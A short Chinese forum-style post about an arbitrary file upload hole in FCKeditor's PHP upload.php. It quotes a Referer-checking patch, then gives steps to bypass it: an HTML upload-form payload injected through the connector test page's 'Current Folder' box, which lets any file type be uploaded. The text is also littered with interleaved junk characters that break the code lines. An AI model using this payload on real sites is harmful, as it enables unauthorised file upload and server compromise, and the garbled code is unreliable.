漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php1 s m2 F# s2 [( C3 G: Z
网上给出的修复方案是2 U! v: p+ s2 u- l7 E
修复方法,删除FCK编辑器用其他的编辑器/ z+ S* d# d ^3 H3 H
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
+ i/ T1 W9 n+ C. H! w$ x在
9 _) r' {4 t8 _6 e3 |require(‘config.php’);, n( w/ R3 R' c0 j2 t# ` C# n" P
require(‘util.php’);& E2 W" c5 F, Q- X4 o- z7 r" E0 r
的下面添加以下代码—————————–6 K. `/ E9 z6 B
//防止外部提交
3 u5 @& z$ c4 }0 nfunction outsidepost()5 h) j6 X- w/ M f& y/ A5 T. E
{, f9 j( `/ a7 K+ G5 f" o9 Y
$servername=$_SERVER['SERVER_NAME'];! }# |* m, N: x; n
$sub_from=@$_SERVER['HTTP_REFERER'];# d- g) r8 s" A7 j! C; E
$sub_len=strlen($servername);
/ i8 ^0 T* A0 k1 r$checkfrom=substr($sub_from,7,$sub_len);
; V& O. [9 S( F' @1 Iif($checkfrom!=$servername){
; M' ~: f& _! X9 `echo(“you don’t outsidepost!”);% [& }' G! I, r$ I% w0 G
exit;
7 d. G5 D0 `) c}3 Z5 L9 {- v4 R* G7 X- E2 N8 j' k! m6 K7 Y
}+ r, }) A5 E% ~ R0 ?, ^; j
outsidepost();7 |& p& F0 |+ V
防止外部提交,但是没有防止内部提交,! {. ]/ B0 a4 W; t
利用方法:
6 L I# c. o7 ?) A1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html. E' c9 g, T" \2 o, m
2,在Current Folder 框输入4 |9 L- U+ Y0 v# e' K) D( ]- i
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>+ v% N$ Z1 | v/ V8 i2 |4 \
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。2 t* p$ f2 N( E
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |